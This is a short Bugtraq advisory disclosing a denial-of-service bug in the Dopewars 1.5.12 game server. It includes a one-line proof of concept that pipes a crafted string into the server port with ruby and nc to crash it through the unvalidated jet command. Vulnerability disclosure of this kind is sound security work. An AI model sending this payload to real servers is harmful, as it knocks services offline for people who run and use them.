[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Dopewars 1.5.12 Server Denial of Service

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Dopewars 1.5.12 Server Denial of Service
From: dougtko@xxxxxxxxx
Date: 6 Oct 2009 19:07:38 -0000

## Description ##

The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to 
a lack of input validation.

## POC ##

ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902

## Fix ##

This issue is resolved in the SVN version of the application.

## Discovered by Doug Prostko

Prev by Date: [USN-842-1] Wget vulnerability
Next by Date: CORE-2009-0922: Jetty Persistent XSS in Sample Cookies Application
Previous by thread: [USN-842-1] Wget vulnerability
Next by thread: CORE-2009-0922: Jetty Persistent XSS in Sample Cookies Application
Index(es):
- Date
- Thread